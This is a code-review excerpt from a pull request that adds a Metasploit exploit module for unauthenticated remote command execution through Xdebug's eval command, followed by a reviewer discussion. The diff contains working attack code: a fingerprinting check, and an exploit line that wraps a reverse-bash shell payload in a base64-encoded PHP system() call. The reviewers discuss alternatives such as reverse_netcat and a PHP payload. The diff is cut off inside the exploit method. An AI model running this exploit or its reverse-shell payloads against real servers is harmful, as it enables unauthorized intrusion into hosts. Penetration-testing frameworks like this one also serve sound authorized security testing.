modules/exploits/unix/http/xdebug_unauth_exec.rb

```diff
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'xdebug Unauthenticated OS Command Execution',
+      'Description' => %q{
+       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
+       This allows the attacker to execute arbitrary php code as the context of the web user.
+      },
+      'DisclosureDate' => 'Sep 17 2017',
+      'Author' => [
+        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
+        'Shaksham Jaiswal', # MinatoTW
+        'Mumbai' # Austin Hudson
+      ],
+      'References' => [
+        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
+        ['URL', 'https://paper.seebug.org/397/']
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => [ARCH_CMD],
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'cmd/unix/reverse_bash'
+      },
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
+        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
+        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+        OptAddress.new('RHOST', [true, "Target address"]),
+        OptInt.new('RPORT', [true, "Target port", 80])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => datastore["PATH"],
+        'method' => 'GET',
+        'vars_get' => {
+          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+        }
+      })
+      vprint_status "Request sent\n#{res.headers}"
+      if res && res.headers.to_s =~ /XDEBUG/i
+        print_good("Looks like remote server has xdebug enabled\n")
+        return Exploit::CheckCode::Detected
+      else
+        return Exploit::CheckCode::Safe
+      end
+      rescue Rex::ConnectionError
+        return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    cmd = "eval -i 1 -- " + Rex::Text.encode_base64("system(\" bash -c \'#{payload.encoded}\'\")") + "\x00"
```

Comment:
Is there a reason for using `bash -c ''` ? What if the target doesn't have `bash` ?

Additionally, this approach makes `'` a `BadChar`.

I haven't read the writeup in detail, but it looks like you're executing raw PHP code in an `eval`. Is there a reason you opted for `ARCH_CMD` over `ARCH_PHP` ?

Reply:
For some reason the one liner isn't executed without the `bash -c` flag.If the target doesn't have bash we could maybe try `reverse_netcat` and similar modules?
I've tested `reverse_netcat` and it works fine.
Also we'll try to address the `ARCH_PHP` issue in a while.

Reply:
Using `ARCH_PHP` is generally better, where possible. This would also avoid having to use `bash -c`.

Reply:
Addressed all issues except the `ARCH_PHP` which we'll test and let you know.